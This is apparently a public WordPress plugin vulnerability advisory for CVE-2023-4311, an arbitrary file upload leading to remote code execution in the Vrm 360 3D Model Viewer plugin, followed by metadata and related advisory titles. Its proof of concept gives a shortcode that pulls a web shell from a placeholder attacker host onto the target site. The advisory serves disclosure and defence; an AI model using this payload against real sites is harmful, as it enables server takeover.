Vrm 360 3D Model Viewer <= 1.2.1 – Contributor+ Arbitrary File Upload Leading to RCE | CVE 2023-4311 | Plugin Vulnerabilities

Description

The plugin is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode.

Proof of Concept

1. Host a webserver with a shell named `webshell.zip.php`
2. As a contributor, add the shortcode: `[vrm360 canvas_name=s1 model_url=http://ATTACKER_HOST/webshell.zip.php aspect_ratio=1.8 initial_offset=0.9]`
3. Press "Preview" > "Preview in new tab"
4. See that the file has been uploaded to https://example.com/wp-content/uploads/tmp/webshell.zip.php

Affects Plugins

No known fix

References

CVE

YouTube Video

Classification

Type

RCE

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Jonatas Souza Villa Flor

Submitter

Jonatas Souza Villa Flor

Submitter website

https://decriptosec.com/

Submitter twitter

Verified

Yes

WPVDB ID

21950116-1a69-4848-9da0-e912096c0fce

Timeline

Publicly Published

2023-11-24 (about 2 years ago)

Added

2023-11-24 (about 2 years ago)

Last Updated

2023-11-24 (about 2 years ago)

Other

Published

Title

Published

2024-04-25

Title

Customify Site Library <= 0.0.9 - Unauthenticated Remote Code Execution

Published

2025-01-06

Title

Design for Contact Form 7 Style WordPress Plugin – CF7 WOW Styler <= 1.7.1 - Unauthenticated Arbitrary Shortcode Execution and Reflected Cross-Site Scripting

Published

2014-08-01

Title

TDO Mini Forms 0.13.9 - tdomf-upload-inline.php File Upload Remote Code Execution

Published

2024-09-24

Title

Special Text Boxes < 6.2.5 - Unauthenticated Arbitrary Shortcode Execution

Published

2025-08-18

Title

Cloudflare Image Resizing < 1.5.7 - Missing Authentication to Unauthenticated Remote Code Execution via rest_pre_dispatch Hook